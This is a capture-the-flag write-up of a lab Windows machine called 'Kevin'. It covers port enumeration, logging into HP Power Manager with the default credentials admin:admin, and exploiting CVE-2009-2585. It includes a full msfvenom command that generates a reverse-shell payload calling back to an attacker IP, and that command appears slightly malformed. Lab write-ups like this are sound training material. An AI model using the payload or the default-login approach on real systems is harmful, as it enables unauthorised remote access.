Kevin

Source: Proving Grounds OS: Windows Community Rating: Easy

Enumeration & Reconnaissance

  • Started autorecon and got flooded with open ports: 80, 135, 139, 445, 3389, 49152 -> 49159

  • Naturally, I started with my favorite, HTTP (80).

Gaining Initial Access

  • I was greeted by an HP Power Manager login page.

HP Power Manager Login

  • Out of pure muscle memory, I typed admin:admin, and boom, it worked. After a quick poke around that ended with nothing, I searched for exploits and found CVE-2009-2585.

Got In

Exploitation

  • To use this CVE, I needed a payload. So, I generated one with msfvenom:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.240 LPORT=4444 EXITFUNC=thread -b '\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5' x86/alpha_mixed --platform windows -f python
MSFVenom

  • Replaced the payload in the PoC and ran it, instant shell! And the best part? No privilege escalation needed. The exploit gave me SYSTEM straight away. Easiest win ever.

Access as System

Privilege Escalation

  • None required; I was already SYSTEM upon initial access.

Lessons Learned

  • Check for CVEs

PreviousCraftNextSquid

Last updated